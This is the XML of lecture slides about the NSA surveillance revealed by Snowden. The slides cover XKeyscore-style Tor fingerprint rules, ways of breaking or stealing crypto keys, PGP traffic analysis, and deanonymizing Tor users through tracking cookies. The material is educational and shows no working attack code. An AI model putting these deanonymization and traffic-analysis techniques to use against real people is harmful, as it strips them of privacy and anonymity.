            <a:endParaRPr b="0" lang="en-US" sz="3959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init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: {{ xks::undefine_name("anonymizer/tor/torbridges/emailconfirmation"); }}</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3959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b="1" lang="en-US" sz="3959" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff2600"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r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: {{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static const std::string SCHEMA_OLD = "tor_bridges";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...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if (bridges) {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 ...</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3959" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>      xks::fire_fingerprint("anonymizer/tor/directory/bridge"); }</a:t>
            </a:r>
            <a:br/>
            <a:endParaRPr b="0" lang="en-US" sz="3959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3" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="534" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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2013 NSA Mass Surveillance Revelations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Edward Snowden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550440" y="3178800"/>
            <a:ext cx="139878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spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef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has a datacenter in Utah that can store exabytes (billions of gigabytes) of intercepted communications</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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Metadata (web history)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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Unencrypted data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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Encrypted data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike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4538960" y="3423600"/>
            <a:ext cx="9523440" cy="6351840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280160" y="11247120"/>
            <a:ext cx="22402080" cy="161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Remember that quantum computers will break all public-key crypto deployed today?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Wiretapping Crypto…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IPSec &amp; TLS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Good transport cryptography messes up the NSA, but…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There are tricks…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wiretaps collect encrypted traffic and pass it off to a black-box elsewhere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black box, sometime later, may come back and say “this is the key”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Sabotage: Trojaned pRNGs, both DualEC DRBG and others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Sabotaged pRNGs inevitably lack rollback resistance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Theft: RSA?  No forward secrecy?  HA, got yer key…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="548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Weak Diffie/Hellman: If you always use the same prime p…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takes a lot of work to break the first handshake…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="415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 rest take a lot less effort</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4150" spc="-1" strike="noStrike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3" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="554" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold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fill="hold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fill="hold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fill="hold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fill="hold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fill="hold"/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fill="hold"/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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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Wiretapping Crypto: PGP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(aka the NSA’s friend)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PGP is an utter PitA to use…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it is uncommon, so any usage stands out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has easy to recognize headers…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Even when you exclude </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>-----BEGIN PGP MESSAGE-----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has no forward secrecy…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if you steal someone’s key you can decrypt all their messages!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spews metadata around…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Not only the email headers used to email it…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also (by default) the identity of all keys that can decrypt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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="598" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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PGP is Actually Easy(ish…)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can easily map who talks to whom…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when, and how much data, and who is CC’ed…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1547640" indent="-78336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1" i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Never underestimate the power of traffic analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="44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Thus you have the entire social graph!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can then identify the super nodes…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Those who talk to lots of other people…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then you pwn them!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="638" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold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Query Focused Datasets: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Mostly Write-Only Data with Exact Search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6" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17195400" y="3485880"/>
            <a:ext cx="3519000" cy="4802400"/>
            <a:chOff x="17195400" y="3485880"/>
            <a:chExt cx="3519000" cy="4802400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="287" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="17195400" y="3485880"/>
              <a:ext cx="3519000" cy="4802400"/>
              <a:chOff x="17195400" y="3485880"/>
              <a:chExt cx="3519000" cy="4802400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="288" name="Image" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId1"/>
              <a:srcRect l="20999" t="4378" r="17385" b="3937"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="17195400" y="3485880"/>
                <a:ext cx="3519000" cy="39272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89" name="CustomShape 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="17264880" y="7384680"/>
                <a:ext cx="3382200" cy="903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71280" rIns="71280" tIns="71280" bIns="71280" anchor="ctr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5000" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                  </a:rPr>
                  <a:t>Username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pic>
          <p:nvPicPr>
            <p:cNvPr id="290" name="Image" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="1789" t="2129" r="428" b="106"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17773560" y="5969520"/>
              <a:ext cx="2363040" cy="55692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291" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17195400" y="8635320"/>
            <a:ext cx="3519000" cy="4802040"/>
            <a:chOff x="17195400" y="8635320"/>
            <a:chExt cx="3519000" cy="4802040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="292" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="17195400" y="8635320"/>
              <a:ext cx="3519000" cy="4802040"/>
              <a:chOff x="17195400" y="8635320"/>
              <a:chExt cx="3519000" cy="4802040"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="293" name="Image" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:srcRect l="20999" t="4378" r="17385" b="3937"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="17195400" y="8635320"/>
                <a:ext cx="3519000" cy="39272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94" name="CustomShape 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="17806680" y="12533760"/>
                <a:ext cx="2298600" cy="903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71280" rIns="71280" tIns="71280" bIns="71280" anchor="ctr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5000" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                  </a:rPr>
                  <a:t>Cookie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pic>
          <p:nvPicPr>
            <p:cNvPr id="295" name="Image" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="1789" t="2129" r="428" b="106"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17773560" y="11118600"/>
              <a:ext cx="2363040" cy="55692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296" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13166280" y="8635320"/>
            <a:ext cx="3519000" cy="4802040"/>
            <a:chOff x="13166280" y="8635320"/>
            <a:chExt cx="3519000" cy="4802040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="297" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13166280" y="8635320"/>
              <a:ext cx="3519000" cy="4802040"/>
              <a:chOff x="13166280" y="8635320"/>
              <a:chExt cx="3519000" cy="4802040"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="298" name="Image" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:srcRect l="20999" t="4378" r="17385" b="3937"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="13166280" y="8635320"/>
                <a:ext cx="3519000" cy="39272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299" name="CustomShape 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14569920" y="12533760"/>
                <a:ext cx="712080" cy="903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71280" rIns="71280" tIns="71280" bIns="71280" anchor="ctr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5000" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                  </a:rPr>
                  <a:t>IP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pic>
          <p:nvPicPr>
            <p:cNvPr id="300" name="Image" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:srcRect l="1789" t="2129" r="428" b="106"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13744800" y="11118600"/>
              <a:ext cx="2363040" cy="55692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301" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737440" y="9061920"/>
            <a:ext cx="8888400" cy="395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Site: arstechnica.com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Username: broidsrocks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Cookie: 223e77...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From IP: 10.271.13.1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Seen: 2012-12-01 07:32:24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02" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737440" y="9061920"/>
            <a:ext cx="8888400" cy="395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Site: arstechnica.com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Username: broidsrocks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Cookie: 223e77...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From IP: 10.271.13.1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Seen: 2012-12-01 07:32:24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03" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737440" y="9061920"/>
            <a:ext cx="8888400" cy="395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Site: arstechnica.com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Username: broidsrocks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Cookie: 223e77...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From IP: 10.271.13.1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5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Seen: 2012-12-01 07:32:24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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="670" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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nodeType="clickEffect" fill="hold" presetClass="emph" presetID="6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15565 -0.110858">
                                      <p:cBhvr>
                                        <p:cTn id="686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nodeType="withEffect" fill="hold" presetClass="emph" presetID="6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85444 -0.104404">
                                      <p:cBhvr>
                                        <p:cTn id="691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nodeType="withEffect" fill="hold" presetClass="emph" presetID="6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89788 -0.469990">
                                      <p:cBhvr>
                                        <p:cTn id="696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EPICFAIL Query Focused Database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Tor users who don’t use Tor Browser...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Can be discovered if they use the same browser with and without Tor</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="48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course, the "normal" browser has lots of web tracking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Advertising, etc....</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="48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the EPICFAIL QFD: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All tracking cookies (for specified sites) seen both from a Tor exit node and from a non-Tor source</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="48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Allows deanonymization of Tor users</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="698" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="699" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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fill="hold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fill="hold"/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fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Using the MARINA Database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Interface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262440" y="3178800"/>
            <a:ext cx="1244988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22880" indent="-72036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0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Provides a GUI for doing queries to the more centralized/longer term store</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6070" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1080720" indent="-72756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Specifically designed to provide easy ways to go “this is the guy’s email, what other email/selectors apply” among other things</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="722880" indent="-72036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0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Fields include:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6070" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1080720" indent="-72756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User Activity</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1080720" indent="-72756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Active User</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1080720" indent="-72756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Profile Data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1080720" indent="-72756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SparklePony?!?!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4600" spc="-1" strike="noStrike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0" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13093200" y="3056040"/>
            <a:ext cx="22366440" cy="10253160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="311" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353760" y="5179680"/>
            <a:ext cx="16134120" cy="83707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3" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="724" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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Break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Random Fact… Alessandro Chiesa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550440" y="3178800"/>
            <a:ext cx="1619136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Co-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founder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Zcash,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anonymo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cryptocur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rency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setup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phase for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Zcash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required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cryptogra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phic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ceremony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between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several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parties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(multi-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party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computat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ion)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Each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party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needs to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generate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their own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randomn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ess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privately</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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18969840" y="3180960"/>
            <a:ext cx="4948920" cy="6168600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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17282160" y="9966960"/>
            <a:ext cx="6583680" cy="228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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="730" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold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fill="hold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Break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Random Fact… Alessandro Chiesa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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13608720" y="3291840"/>
            <a:ext cx="9227160" cy="4916520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13117680" y="8268480"/>
            <a:ext cx="9930960" cy="5431680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="321" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670040" y="3265200"/>
            <a:ext cx="8135640" cy="502848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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436400" y="8778240"/>
            <a:ext cx="8540280" cy="480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5" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="7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SIGINT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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498960" y="4079520"/>
            <a:ext cx="4654800" cy="903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BBC Pageview</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="326" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2148840" y="5063040"/>
            <a:ext cx="5072400" cy="1810800"/>
            <a:chOff x="2148840" y="5063040"/>
            <a:chExt cx="5072400" cy="1810800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="327" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2148840" y="5970240"/>
              <a:ext cx="507240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Double-click Ad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28" name="Line 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4161240" y="5063040"/>
              <a:ext cx="355680" cy="91656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9" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8611560" y="5868360"/>
            <a:ext cx="6287040" cy="1829520"/>
            <a:chOff x="8611560" y="5868360"/>
            <a:chExt cx="6287040" cy="1829520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="330" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10123560" y="5868360"/>
              <a:ext cx="477504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AnonDude is...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31" name="Line 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8611560" y="6924600"/>
              <a:ext cx="2511720" cy="77328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2" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4956480" y="6953400"/>
            <a:ext cx="5077080" cy="1632600"/>
            <a:chOff x="4956480" y="6953400"/>
            <a:chExt cx="5077080" cy="1632600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="333" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4956480" y="7682400"/>
              <a:ext cx="507708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Linked User IDs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34" name="Line 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6129360" y="6953400"/>
              <a:ext cx="355680" cy="91656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5" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4874400" y="8830440"/>
            <a:ext cx="11569320" cy="1574280"/>
            <a:chOff x="4874400" y="8830440"/>
            <a:chExt cx="11569320" cy="1574280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="336" name="CustomShape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4874400" y="9501120"/>
              <a:ext cx="1156932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IP Activity History (unmasked VPNs)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37" name="Line 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8500320" y="8830440"/>
              <a:ext cx="355680" cy="91656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8" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13946760" y="7684920"/>
            <a:ext cx="5200200" cy="1829520"/>
            <a:chOff x="13946760" y="7684920"/>
            <a:chExt cx="5200200" cy="1829520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13946760" y="7684920"/>
              <a:ext cx="520020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"IP Intelligence"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40" name="Line 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="14771880" y="8647560"/>
              <a:ext cx="866880" cy="86688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1" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17496720" y="5868360"/>
            <a:ext cx="6157440" cy="1829520"/>
            <a:chOff x="17496720" y="5868360"/>
            <a:chExt cx="6157440" cy="1829520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="CustomShape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17496720" y="5868360"/>
              <a:ext cx="6157440" cy="903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71280" rIns="71280" tIns="71280" bIns="7128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5000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica Light"/>
                  <a:ea typeface="Helvetica Light"/>
                </a:rPr>
                <a:t>AnonDude's House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343" name="Line 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="18222480" y="6833520"/>
              <a:ext cx="864720" cy="864360"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="8892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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="748" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="770" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17662320" y="9187920"/>
            <a:ext cx="2058480" cy="2379960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34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Computer Network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Exploitation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7" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11161440" y="3260520"/>
            <a:ext cx="2058480" cy="2379960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600"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3703320" y="7098120"/>
            <a:ext cx="4500720" cy="1147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/script.js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www.targetdomain.com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cookie: id=iamavictim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18231120" y="7081920"/>
            <a:ext cx="1986120" cy="8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HTTP 200 OK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.....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50" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4389120" y="3756600"/>
            <a:ext cx="2093040" cy="2026080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17323200" y="3401640"/>
            <a:ext cx="3981240" cy="2736360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Line 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691600" y="6804360"/>
            <a:ext cx="13000320" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="8892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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915280" y="6545520"/>
            <a:ext cx="515520" cy="515520"/>
          </a:xfrm>
